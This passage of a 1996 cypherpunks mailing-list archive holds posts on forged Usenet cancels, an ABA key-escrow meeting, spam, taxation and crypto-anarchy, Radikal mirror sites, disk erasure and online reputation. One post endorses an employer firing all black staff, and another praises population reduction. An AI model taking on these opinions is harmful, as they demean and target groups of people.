] * Generate a new message-id, M'i.
]
] * Repost Ai with message-id M'i, adding the header "Supersedes: Mi"
]
] * Replace M' by M'i in your associate list.
]
]As an added touch, you can automatically add a little blurb to the reposted
]article providing header information about the forged cancel to which you're
]reacting.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jya at pipeline.com Sat Sep 14 10:50:32 1996
From: jya at pipeline.com (John Young)
Date: Sun, 15 Sep 1996 01:50:32 +0800
Subject: EGO_war
Message-ID: <199609141524.PAA09661@pipe1.t1.usa.pipeline.com>

9-13-96. FiTi: "On manoeuvres in the modern military mind."
The most interesting challenge is psychological. Participants learn the hard way that they cannot simply command. They must persuade, cajole and win over subordinates, allies and politicians, who may have varying agendas. While lower level command requires physical courage and speed of decision, higher command involves moral courage, intellectual vision and perseverance. "Politicians are being pressed by interest groups on all sides, while the military will usually only focus on their aspect of the task. The collision of those two sets of values can be quite a shock." The more subtle message from the historians is the lethal potential of petty jealousies, warring ambitions and clashing egos. ----- http://jya.com/egowar.txt (16 kb) EGO_war From rah at shipwright.com Sat Sep 14 11:21:44 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 15 Sep 1996 02:21:44 +0800 Subject: ISC Meeting Agenda Message-ID: --- begin forwarded text Date: Sat, 14 Sep 1996 08:53:40 -0400 (EDT) From: Michael S Baum To: www-buyinfo at allegra.att.com Subject: ISC Meeting Agenda Mime-Version: 1.0 ========================================================== MEETING NOTICE ========================================================== Please correspond with: Michael S. Baum, Esq. 33 Tremont Street Cambridge, MA 02139-1227 USA V: +1 617.661.1234 F: +1 617.661.0716 E: michael at verisign.com Subject: INFORMATION SECURITY COMMITTEE MEETING NOTICE Dear Committee Member: You are cordially invited to participate in a meeting of the Information Security Committee, Section of Science & Technology, American Bar Association, on Friday/Saturday, October 18-19, 1996, in Boston. The Committee will advance its development of commercial key escrow guidelines as well as consider digital signature legislative initiatives in the several States and other jurisdictions, and continue its consideration of digital signature evidence and liability.
Consistent with Section policy, ISC meeting participants MUST be members of both the ABA and the ABA Section of Science and Technology. Please contact Ann Kowalsky, Manager Section of Science & Technology, at ABA offices in Chicago by phone: +1 312.988.5599, fax: +1 312.988.5628, or email: sciencetech at attmail.com for membership information. It is possible to become a paid member of the ABA and the ISC at the meeting. Dan Greenwood, ISC member, has kindly agreed to host the meeting at the Information Technology Division of the Commonwealth of Massachusetts. Dan can be reached at 617.973.0071 or DGreenwood at state.ma.us for directions & logistical information. Meeting details appear below. I look forward to seeing you in Boston. Sincerely, Michael S. Baum Chair, Information Security Committee Section of Science & Technology, ABA --------------- INFORMATION SECURITY COMMITTEE October 18-19, 1996 Tentative Agenda (see "Meeting Details," next page) (In extended sessions, breaks will be taken as needed.) October 18, 1996 Friday 8:30-9:00 Greetings, breakfast, administrative matters. 9:00-9:30 Introductions, meeting logistics, Guidelines update, questions; PKI-relevant standards reports. 9:30-12:00 Legislative/Regulatory Update (including open conference call with digital signature leg./reg. drafting committee representatives in the US and abroad). 12:00-13:00 Joint lunch with Boston Bar Assn, Computer Law Committee. 13:00-18:00 Continuation of legislative/regulatory update with digital signature leg./reg. drafting committee representatives. 18:00-???? Watering hole discussions; possible continuation of work group meetings. October 19, 1996 Saturday 8:30-9:00 Breakfast, et cetera. 9:00-10:00 Presentation by Key Escrow work group. 10:00-12:00 Breakout sessions on work groups. 12:00-13:00 Working lunch and guest presentation on "Assuring Quality and the Accreditation of Certification Authorities" by invited representative of the Nat'l Inst. of Standards and Tech. 
13:00-15:00 Presentations by Work Groups. 15:00-15:30 Path Forward; wrap-up. ISC MEETING DETAILS October 18-19, 1996 Members are urged to participate in one of the work groups that will be presenting/meeting during the ISC's meeting. "Addendum" Work Group Contact: Ruven Schwartz (rschwart at research.westlaw.com) Tom Smedinghoff (tsmed at mbc.com) Joe Wackerman (jwackerm at email.usps.gov) The Addendum Work Group will continue drafting a digital signature trading partner agreement -- integrating the principles of the Digital Signature Guidelines, and developing additional practical commentary for this model form of electronic commerce agreement. Evidentiary Work Group Contact: Stan Kurzban (qbjw99a at prodigy.com) or Serge Parisien (parisise at droit.umontreal.ca) The Evidentiary Work Group will complete and present a provisional outline for a tutorial on the evidentiary implications of digitally signed information and advance drafting of material for each section of the tutorial. Key Escrow Work Group (KEWG) Contact: Dwight Olson (73522.3542 at compuserve.com) or Randy Sabett (rsabett at venable.com) The KEWG will focus on the legal and technical aspects of commercial key escrow. The group will seek to accurately explore all major issues surrounding this topic, and produce a set of draft guidelines for comment. The proposed guidelines are intended to facilitate secure electronic commerce by clarifying the rights and obligations of the parties involved in voluntary commercial key escrow. The work product may take one or more forms including: (i) a "restatement" of the relevant law and practice, (ii) a model state or federal law or international convention, (iii) a set of principles that can be incorporated by reference into agreements or used for the interpretation of legal aspects of voluntary key escrow, or (iv) a set of "gap filler" provisions. 
Liability Work Group Contact: Maureen Adamache (rmadama at magi.com) The liability work group will meet as necessary to discuss the apportionment of liabilities among PKI providers and users. Previously, this task was considered in the ISC's own work-product, the Digital Signature Guidelines. Future documents that will be considered include Certification Practice Statements, and digital signature legislative and regulatory work product. State Government Digital Signatures Laws & Regulations Contact: Dan Greenwood (DGreenwood at state.ma.us) The digital signature legislative and regulatory working group will compile, evaluate and compare the various emerging approaches by states and other jurisdictions. Work product will include a web-based comprehensive "one-stop shop" for jurisdictions wishing to review current approaches. First-time participants (who plan to attend the October 18-19, 1996 meeting) must request attendance and submit a brief work-product (typically 3-5 pages) relevant to the subject matter. Please contact Ruven Schwartz (v: 612.687.8095, f: 612.687.7907, or e: rschwart at research.westlaw.com) for details. Meeting Location: McCormack Building (Across Bowdoin Street from the State House) 1 Ashburton Place Room 1, 21st Floor Boston, Massachusetts USA (Contact: Dan Greenwood +1 617.973.0071) Meals: The cafeteria will be available for lunch on Friday for those ISC Members who choose to work through the joint lunch session. On Saturday we will probably order in pizza. Lodging: A very nearby hotel is the Holiday Inn, Government Center, 5 Blossom Street, Boston. The regular rate during our meeting dates is $219.95/night. However, the Reservation Supervisor (Kim) has offered a rate of $199.95 to Committee members who request the "Great Rate" plan. Call reservations at +1 617.742.7630. For a better (but more expensive) hotel near Government Center, try the Parker House at +1 617.227.8600. 
The Omni Parker House (nicer than Holiday Inn) quoted a rate of $169/night for a single with a king or queen bed and $119/night for a single with a double bed. The rooms are very small - but the hotel is nice. See also a Greater Boston Bed & Breakfast directory: http://www.inovatec.com/bb/resservc/GREATER/GREATER.htm. RSVP: Please confirm your intention to participate to Ann Kowalsky, Section Manager, Section of Science and Technology (sciencetech at attmail.com) as soon as possible. See you in Boston! =========================================================================== --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From AwakenToMe at aol.com Sat Sep 14 11:53:00 1996 From: AwakenToMe at aol.com (AwakenToMe at aol.com) Date: Sun, 15 Sep 1996 02:53:00 +0800 Subject: unwanted mail..what can I do? Message-ID: <960914123556_284798391@emout14.mail.aol.com> In a message dated 96-09-14 01:18:49 EDT, dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes: << AwakenToMe at aol.com writes: > I recieved mail from netfree.com.. > I tried mailing it back (it def. had a forged address, but I got the netfree > from the mail header.....) > So anyway..... I tried sending to root at netfree....my mail was rejected (not > unknown ...it was rejected by the system) said it wasnt authorized... so I > tried support at netfree...same thing. > It ISSSSS rather annoying...any sugestions? Yes, a bunch of them: 1. Get a life. Learn to delete unwanted e-mail. Get a real shell account. 2. Ask AOL to let its users decide what e-mail to reject automatically (like procmail). They've been promising this capability by the end of September. Then you can set up your account to get no more e-mail from netfree. >> Typical asshole response. I must thank chuck at nova..etc. 
for his TRULY helpful response. But you........get a real shell account?? I do thank you. netcom and a school system. I can delete unwanted mail. But maybe I LIKE to yell at people who spam me. And I've never received mail from netfree before..nor since... that's NOT my problem. Learn to comprehend what others write. I wanted to know what I can do about getting in contact with them. It is in my opinion not right to forge email addresses...people don't do it when they send me US postal mail From jya at pipeline.com Sat Sep 14 11:53:48 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 02:53:48 +0800 Subject: MTH_ead Message-ID: <199609141641.QAA11110@pipe4.t2.usa.pipeline.com> 9-14-96. WaPo: "Empty-Head Network Fails to Link TWA Crash to Terrorism." The frantic overseas intelligence-gathering effort, which has included eavesdropping, use of informants and offers of large cash payments for leads, has been undertaken by the CIA, the NSA and the DEA, as well as a number of foreign investigative agencies. The NRO has analyzed voluminous archives of intelligence drawn from spy satellites, intercepted phone calls and electronic eavesdrops gathered before the crash. Since right after the TWA crash, the NSA started monitoring phone conversations of people believed to have ties to terrorist groups, as well as trying to track the movements of suspected terrorists. The CIA, working through its sources, has been offering money for leads on any kind of terrorist role. The DEA has been using overseas agents to gather intelligence; the FBI liaisons stationed in 23 countries are working to gather intelligence on the crash; and Scotland Yard and the Mossad are also empty-handed (not Red-handed -- yet). ----- http://jya.com/mthead.txt (10 kb) MTH_ead From admin at superhot.com Sat Sep 14 13:03:56 1996 From: admin at superhot.com (Admin) Date: Sun, 15 Sep 1996 04:03:56 +0800 Subject: Nonsense, absolute nonsense...
[Fwd: HipCrime and Art] Message-ID: <199609141737.LAA05928@rintintin.Colorado.EDU> At 09:53 PM 9/13/96 -0700, you wrote: >>>At 21:50 9/11/96, Ross Wright wrote to >>>cypherpunks at toad.com and remailer-operators at c2.org: >>>>As I said having a website invites comments. It's like being a >>>>public figure. In effect you are publishing your e-mail address. >>> >>> >>>Interesting perspective. However, placing an email address on a web page >>>is by no means an offer to take "comments" (i.e., marketing spams) on >>>anything that strikes the spammer's fancy. >> >>How would you know what the *intent* of these other people is in placing >>mailme: tags on their public pages unless you have been to the specific >>pages. You speak only for yourself, yet you try to imply that you speak for >>everyone on the www who has placed a mailto: tag on their pages. >> > >I think this is exactly the point. On a given page I might have several >mailto tags. One for comments on some subject, one for feedback, and one >for the webmaster. I expect the person mailing me to take the time to use >the correct mailbox. I created a page urging political activism, and >included a mailto for all the relevant Senators and Representatives. I >hardly think they are interested in this kind of spam. Of course, that would be for THEM to decide what they find interesting or not. Every response to this thread always seems to impart some speculation as to what other people might or might not find interesting. What one finds of interest another may not so why don't we leave it up to the recipients themselves instead of some self appointed censors. I'll decide whats interesting to me, you decide what is interesting to you, and the senators can decide whats interesting to them. I'm sure that some senators/reps on the various endowment for the arts committees, and or the technology oversight committees would have found HipCrime's sight to be of some interest. 
Of course if it was a blurb of some new mixmaster/remailer development, you would have found it of interest, so let's stop trying to guess what other people want and speak for ourselves. > >Trawling the web for every address you can find, then mailing them all >seems very inappropriate. To you it may not seem appropriate, as it's a subjective judgement, I'm sure that some brown-shirted jack-booted gov't officials believe that using a remailer for any reason is inappropriate....that's what's great about this world, we all have our own subjective beliefs. admin > > -Lance > >---------------------------------------------------------- >Lance Cottrell loki at obscura.com >PGP 2.6 key available by finger or server. >Mixmaster, the next generation remailer, is now available! >http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com > >"Love is a snowmobile racing across the tundra. Suddenly >it flips over, pinning you underneath. At night the ice >weasels come." > --Nietzsche >---------------------------------------------------------- > > > <>________________Lowest_Priced_Long_Distance__________________<> ||Long Distance 9.9¢/min |Helping hardworking people || ||9.9¢ Anytime, Anywhere in US! |like yourself pay the || ||Free sign-up, 6 second billing |lowest possible price for || ||http://www.superhot.com/phone |high quality LD service. || <>-----------------------1_303_692_5190------------------------<> From asgaard at Cor.sos.sll.se Sat Sep 14 14:23:57 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Sun, 15 Sep 1996 05:23:57 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: >The 70% already _are_ cutting the throats of the other 30%. It's called a >60%+ tax rate. This is the sum of: federal income tax, state income tax, Most of these taxes are not used for feeding the poor but to support the Nomenclatura of the Bureaucracy and we all want to get rid of that.
The beauty of a simple tax on production of goods for transfer to a few necessary institutions is its simplicity - no need for millions of clerks to implement the System like now. And the Basic_Needs_Refund should, as I suggested, be paid to ALL citizens, for ease of administration. The idea of production tax, as opposed to the present system of income tax, has been investigated by economic theorists for years and some of them believe in it. I can't go into details because my knowledge is lacking and my interest in the academic subject of economy is moderate, but such taxation seems to fit with crypto-anarchy in that physical goods in any but the most insignificant scale can't be hidden by cryptography. And I rather pay some taxes (but optimally much less than now) than have my throat literally cut by a revolting 'mob of servants'. >The masses have realized, as De Tocqueville predicted 150 years ago, that >they can use the democratic process to pick the pockets of others. This is >why I have no faith in "democracy," and consider crypto anarchy to be the >best way to undermine this flawed system. I agree with most of this. As some kind of an anarchist (but not a pure anarcho-capitalist) I can of course not accept the basic rule of democracy: that a majority (big or slight) should be able to decide for the minority; or decide for the individual in any but the most obvious ways (imprisoning killers and thieves etc). But I believe that most people really want to work to some extent, to be part of the economic process and gain a standing above the minimal one - hence there is no danger in a Basic-Feed-Refund system. >Cf. what sociologists call "the demographic transition." Countries that >value learning and wealth are _not_ facing a population problem. In fact, >many such countries are now at "below replacement" birth levels. And that's good.
The world population really should go back to around 1 billion for achieving a stable ecology (with singing birds for the peace of minds). The former (?) US system of encouraging young standalone women to make babies to get benefits was very bad. The Chinese system - less benefits the more children you have - is the way to go. >poor of today are receiving this. Ask a peasant of, say, 18th century >Europe if he'd consider himself sheltered and fed if he could have an >apartment in a building, a microwave oven, a television, a MacDonald's >nearby, and enough extra spending money for some beer. That's about exactly what I see as a minimal standard. The microwave oven is the cheapest of ovens. Untaxed beer is the cheapest of drugs. The television could go, though (but it will never do so in the present system - it's needed for indoctrination). >(The point being that people want more than "basic food and shelter," but >are often unwilling to make the commitments and sacrifices in their lives >to gain the wherewithal to earn significant salaries.) This is where we disagree. The real lazy ones are satisfied with a roof over their heads, a microwave oven for cooking pizza, a six-pack and a soap opera. Most people really do want to achieve something more in their lives. >There is a basic error here, one that I see often. Who says that the >"anarcho-capitalists" will freely give away, say, some vast fraction of >their profits so as to subsidize the overall society? Any more so than the Not a vast portion, if the above_basics capitalistic economy blooms. Probably 10% would suffice - what was once paid to the church, the institution that traditionally has supported the ill and poor. The problem with the 100% market economy approach is what to do with those who just can't get it together, i.e. who buy beer for the money that should go to health insurance and then fall ill. It's against basic human instincts to just let them stay in agony.
A system with only voluntary charities might possibly become enough when we have reached the resemblance of an ecology-balanced singularity, but this is not the historical time for suddenly ending ALL welfare - in a situation with unemployment (not accepting making maids and servants of those losing their jobs) mainly due to robotics. >And crypto anarchy means it will not be clear who is making what, who is >generating what income, and where it is located. And the producers of >wealth will be able to move accounts, resources, and even factories around It will always be comparatively easy to locate production plants and farms, and tax them 10% of their production, without even caring who owns them. This would call for a minimum of government clerks. Crypto anarchy will inhibit taxation of all other kinds of businesses, speculations and information transfers - the great bulk of the present economy. >Ask your fellow Swedes about the drain of talent out of Sweden in the 60s >and 70s...the flight of Bergmann, actors and actresses, corporations, and >even ABBA. (Though I understand most of ABBA moved back to Sweden and is >now chummy with the Queen.) This is a myth. I don't have to ask, I was there! I was happy to get rid of Bergman, a much overrated director of boring movies. That actors and actresses left for Hollywood is not surprising, that's where the real movies are made (good and 'bad'). The Swedish film industry - heavily subsidized with tax money! - is mostly producing boring movies, with people just talking, that only intellectual snobs pretend to like. The country is too small for the accumulation of high-risk investment capital that real movies need nowadays. The likes of ABBA's and Bjorn Borg (a tennis player who got very rich) move to tax-friendly places like Monaco, invest their millions and then come back to live off their accumulated wealth. Nothing wrong with that.
Had there been crypto anarchy already in the investment markets they could have stayed all along, of course, but who cares about where they live. And since you mentioned the Queen of Sweden (born in South America, of suspicious post WWII German descent): she is presently the front celebrity for the anti-pedophile movement here - after being shown some kiddie-porn at an 'official' demonstration. Seriously... The big Swedish corporations (Volvo, Eriksson, ASEA etc) have not moved out of the country. Why should they? Swedish wages and taxes are not very different from anywhere else in the Western World. Asgaard From tank at xs4all.nl Sat Sep 14 14:26:18 1996 From: tank at xs4all.nl (tank) Date: Sun, 15 Sep 1996 05:26:18 +0800 Subject: radikal mirrors as of 14-9-1996 Message-ID: <199609141855.UAA07141@xs2.xs4all.nl> ** Radikal Mirrors ** ************************************************ Receive Radikal 154 by email: Send a empty message to radikal at xs4all.nl and you receive issue 154 by mail. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Read the radikal by calling the netherlands (25 numbers). All telefonnr. are listed at the end of this mail. 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Download the radikal archive: http: radikal.tar.gz Radikal-site unix archive radi.zip Radikal-site dos-zip archive ftp: ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII http://www.xs4all.nl/~tank/radikal/radi154.tgz Radikal 154 unix http://www.xs4all.nl/~tank/radikal/radi154.zip Radikal 154 dos-zip If you got your mirror up and running let us know +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Special mirror: de.soc.zensur de.org.politik.spd http://www.altavista.digital.com usenet-search for radikal.zip +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Mirror-sites: ============= 1.http://burn.ucsd.edu/%7Eats/RADIKAL/ 2.http://www.jca.or.jp/~taratta/mirror/radikal/ 3.http://www.serve.com/~spg/ 4.http://huizen.dds.nl/~radikal 5.http://www.canucksoup.net/radikal/index.html 6.http://www.ecn.org/radikal 7.http://www.well.com/~declan/mirrors/ 8.http://www.connix.com/~harry/radikal/index.htm 9.http://www.ganesa.com/radikal/ 10.http://www.denhaag.org/~radikal 11.http://www.knooppunt.be/~daniel/radikal 12.http://emma.unm.edu/radikal 13.http://www.tacacs.com/radikal/" 14.http://www.dsvenlo.nl/~vvd/radikal/ 15.http://www.why.net/home/static/radi 16.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 17.http://www.xs4all.nl/~jeroenw/radikal/ 18.http://home.ipr.nl/~radikal/ 19.http://www.dreamy.demon.co.uk/occam/ 20.http://www.ibmpcug.co.uk/~irdial/live_free/ 21.http://zero.tolerance.org/radi/index.htm 22.http://www.meaning.com/library/radikal/ 23.http://www.xs4all.nl/~irmed/radikal/ 24.http://www.walli.uwasa.fi/~tviemero/radikal 25.http://www.sko.it/~sfede/radi/index.htm 26.http://www.bart.nl/~sz/index.html 27.http://bellp.med.yale.edu/index.htm 28.http://www.euronet.nl/users/funest/radi/index.htm 29.http://fine.com/radikal 30.http://www.lab.net/radikal 31.http://www.charm.net/~gbarren/radikal 
32.http://login.datashopper.dk/~pethern/radikal/ Phone: Call and login as "new". So first dail the international number +31 (hollands international code) and than one of these numbers. Amsterdam Zoetermeer Maarssen 020 5350535, V.34 079 3611011, V.34 0346 550455, V.34 020 4223422, UUCP 079 3600800, ISDN PPP 0346 553613, ISDN PPP 020 6265060, ZyXEL 079 3630569, ISDN X.75 0346 555285, ISDN X.75 020 4229700, ISDN PPP 020 4206782, ISDN X.75 Hoorn Geleen Leeuwarden 0229 212177, V.34 046 4789478, V.34 058 2157815, V.34 0229 219717, ISDN PPP 046 4230555, ISDN PPP 058 2130910, ISDN PPP Goes Assen 0113 252900, V.34 0592 331531, V.34 0113 270110, ISDN PPP 0592 331278, ISDN PPP Willemstad Deurne 0168 472472, V.34 0493 323344, V.34 0168 476472, ISDN PPP 0493 351566, ISDN PPP From admin at superhot.com Sat Sep 14 14:33:25 1996 From: admin at superhot.com (Admin) Date: Sun, 15 Sep 1996 05:33:25 +0800 Subject: Exactly the point Lance... [Fwd: HipCrime and Art] Message-ID: <199609141912.NAA13899@rintintin.Colorado.EDU> At 11:30 AM 9/14/96 -0700, you wrote: >>At 09:53 PM 9/13/96 -0700, you wrote: >>>>>At 21:50 9/11/96, Ross Wright wrote to >>>>>cypherpunks at toad.com and remailer-operators at c2.org: >>>>>>As I said having a website invites comments. It's like being a >>>>>>public figure. In effect you are publishing your e-mail address. >>>>> >>>>> >>>>>Interesting perspective. However, placing an email address on a web page >>>>>is by no means an offer to take "comments" (i.e., marketing spams) on >>>>>anything that strikes the spammer's fancy. >>>> >>>>How would you know what the *intent* of these other people is in placing >>>>mailme: tags on their public pages unless you have been to the specific >>>>pages. You speak only for yourself, yet you try to imply that you speak for >>>>everyone on the www who has placed a mailto: tag on their pages. >>>> >>> >>>I think this is exactly the point. On a given page I might have several >>>mailto tags. 
One for comments on some subject, one for feedback, and one >>>for the webmaster. I expect the person mailing me to take the time to use >>>the correct mailbox. I created a page urging political activism, and >>>included a mailto for all the relevant Senators and Representatives. I >>>hardly think they are interested in this kind of spam. >> >>Of course, that would be for THEM to decide what they find interesting or >>not. Every response to this thread always seems to impart some speculation >>as to what other people might or might not find interesting. What one finds >>of interest another may not so why don't we leave it up to the recipients >>themselves instead of some self appointed censors. I'll decide whats >>interesting to me, you decide what is interesting to you, and the senators >>can decide whats interesting to them. >> >>I'm sure that some senators/reps on the various endowment for the arts >>committees, and or the technology oversight committees would have found >>HipCrime's sight to be of some interest. Of course if it was a blurb of some >>new mixmaster/remailer development, you would have found it of interest, so >>lets stop trying to guess what other people want and speak for ourselves. >> >>> >>>Trawling the web for every address you can find, then mailing them all >>>seems very inappropriate. >> >>To you it may not seem appropriate, as its a subjective judgement, I'm sure >>that some brown-shirted jack-booted gov't officials beleive that using a >>remailer for any reason is inappropriate....thats what's great about this >>world, we all have our own subjective beliefs. >> >>admin > >Allow me to make this more concrete. I don't want see any of this fucking >shit in my mailbox just because I have a mailto link on my Mixmaster page. >Is that sufficiently clear? Exactly the point, bingo! The point is this, exactly what do YOU define as *fucking shit* so that anyone who visits your page will know exactly what they can and can't say to Lance Cottrell. 
We've determined that you don't want to receive the HipCrime URL from your mailto: button. What about the next visitor who comes across your page, how will they know exactly what you do or do not find interesting? Will you put a lengthy *what I expect from all correspondents who use my mailto: button* explanation on the page? Perhaps a simple, *don't mail me unless I already know you and want to hear what you have to say...* tag? admin > -Lance > >---------------------------------------------------------- >Lance Cottrell loki at obscura.com >PGP 2.6 key available by finger or server. >Mixmaster, the next generation remailer, is now available! >http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com > >"Love is a snowmobile racing across the tundra. Suddenly >it flips over, pinning you underneath. At night the ice >weasels come." > --Nietzsche >---------------------------------------------------------- > > > From varange at crl.com Sat Sep 14 14:49:24 1996 From: varange at crl.com (Troy Varange) Date: Sun, 15 Sep 1996 05:49:24 +0800 Subject: The HipCrime [NOISE] Message-ID: <199609141949.AA05431@crl8.crl.com> Who cares? The rebuttals by the Hipmeister sound like he's pretty cool. So fuck off, net-cops. From frantz at netcom.com Sat Sep 14 15:56:53 1996 From: frantz at netcom.com (Bill Frantz) Date: Sun, 15 Sep 1996 06:56:53 +0800 Subject: Erasing Disks Message-ID: <199609142059.NAA13108@netcom8.netcom.com> N.B. Your disagreement is with Peter's paper, not me unless I have inadvertently misrepresented what he wrote. At 2:15 AM 9/14/96 -0700, Bill Stewart wrote: >I disagree. The methods for declassification in the Army and >Defense Department security manuals included several approaches: >1) Physical destruction - acid, sandblasters, etc. >2) NSA-Approved Whopping Big Magnets I think Peter was looking for non-destructive methods which would allow continued use of the hard disk >3) NSA-Approved Hopefully-Bugfree computer programs for some computers. 
> >The most secure methods were the unclassified ones - after we >sandblasted our RM05 disk packs, the NSA and KGB can't read anything. >The less secure methods are the ones that require NSA approval - >how strong is a Whopping Big Magnet this year? (Too strong to put >near MY computer lab, thank you! :-) Peter thinks this strength is too strong for practical application. He describes someone who had a strong enough research magnet which bent the platters. Since erasing the clocking tracks requires them to be rewritten at the factory, magnets do not allow reuse of hard disks. >But shredding the floppy? No need to classify that, no secrets leaked Burn after shredding, or you have a puzzle fan reassembling the shredded disk. Hastily, but with regards - Bill ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From hallam at ai.mit.edu Sat Sep 14 16:02:59 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Sun, 15 Sep 1996 07:02:59 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <51amo5$p01@life.ai.mit.edu> Message-ID: <323B1926.5656@ai.mit.edu> Perry E. Metzger wrote: > > Hallam-Baker writes: > > Pity you guys missed out on the idea of trades unions and think that > > employment is some kind of serfdom in which you lose all your > > rights the day you sign up. If you hadn't sold your government to > > the corporations a while back you might have got out of the middle > > ages. > > Yes, we could be a workers paradise like one of those lovely European > countries with double digit unemployment and all. Too bad we didn't go > in for democratic socialism while we could have, eh? Perry, hate to burst your bubble but unemployment in the UK _tripled_ in the first eighteen months of rule by that great socialist Margaret Thatcher.
One third of UK manufacturing industry went bankrupt in the only large scale application of Friedman's ideas. The UK only began to recover after the monetarist policies were consigned to the dustbin. Unemployment remained high despite a sustained attack on workers' rights. The scenario you described is an unjust one but it would be equally unjust if the company was bought out and the new owner decided to sack all black people and people called "Perry". You were the one who brought up the issue of fairness. Phill From dlv at bwalk.dm.com Sat Sep 14 18:00:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 15 Sep 1996 09:00:52 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <323B1926.5656@ai.mit.edu> Message-ID: <3VL0TD46w165w@bwalk.dm.com> Hallam-Baker writes: > unjust if the company was bought out and the new owner decided to sack > all black people and people called "Perry". You were the one who brought > up the issue of fairness. The owner should be able to do that without interference from any gubment. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gregburk at netcom.com Sat Sep 14 18:17:24 1996 From: gregburk at netcom.com (Greg Burk) Date: Sun, 15 Sep 1996 09:17:24 +0800 Subject: No Subject Message-ID: <653f3e543r@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Well, this looks like a chance to quickly correct some mistakes without spending a lot of time framing the issue. tcmay at got.net (Timothy C. May) writes: > But this latest episode illustrates the role of reputations. Namely, my own > reputation is not being harmed by bizarre commentaries from the Vulis-bot. ..among people who directly know you. You seem to see this as an example of reputations in action. But there isn't any "repute" in there at all. Surely this grand theoretical "reputation" framework isn't needed to describe simple direct experience.
And it seems to me that your usage of "reputation" has at different times meant both direct and indirect exposure. This clearly discards important information, often to the detriment of your analysis. Perhaps you can explain why the two separate things are the same in some important way, aside from merely that they both involve esteem. > As its reputation is (apparently) pretty low, and associated with Serdar > Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity > can hardly "assassinate" my character. > A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," > aka "Pablo Escobar," aka several other alternate personalities, wrote > dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. > Did this have an effect on our reputations? Not to people I respected, of > course. And if Detweiler's rants affected my reputation with his peers, > including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, > well, this is to the good. > In the mathematics of reputations, a negative reputation held by one whose > own reputation is negative is a positive. I don't think this is an example of any such thing. I would not respect a person even a tiny bit more just because a kook disrespects them. In fact, since the kooks frequently hold each other in very low esteem, the suggested polarity-math is self-contradictory. Rather, I think this is an example of how direct exposure supercedes reputation. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA== =LdoS -----END PGP SIGNATURE-----
From gregburk at netcom.com Sat Sep 14 18:31:41 1996 From: gregburk at netcom.com (Greg Burk) Date: Sun, 15 Sep 1996 09:31:41 +0800 Subject: Reputation in action Message-ID: <7654f2dw3r@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Well, this looks like a chance to quickly correct some mistakes without spending a lot of time framing the issue. tcmay at got.net (Timothy C. May) writes: > But this latest episode illustrates the role of reputations. Namely, my own > reputation is not being harmed by bizarre commentaries from the Vulis-bot. ..among people who directly know you. You seem to see this as an example of reputations in action. But there isn't any "repute" in there at all. Surely this grand theoretical "reputation" framework isn't needed to describe simple direct experience. And it seems to me that your usage of "reputation" has at different times meant both direct and indirect exposure. This clearly discards important information, often to the detriment of your analysis. Perhaps you can explain why the two separate things are the same in some important way, aside from merely that they both involve esteem. > As its reputation is (apparently) pretty low, and associated with Serdar > Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity > can hardly "assassinate" my character. > A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," > aka "Pablo Escobar," aka several other alternate personalities, wrote > dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. > Did this have an effect on our reputations? Not to people I respected, of > course. And if Detweiler's rants affected my reputation with his peers, > including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, > well, this is to the good. > In the mathematics of reputations, a negative reputation held by one whose > own reputation is negative is a positive. I don't think this is an example of any such thing. 
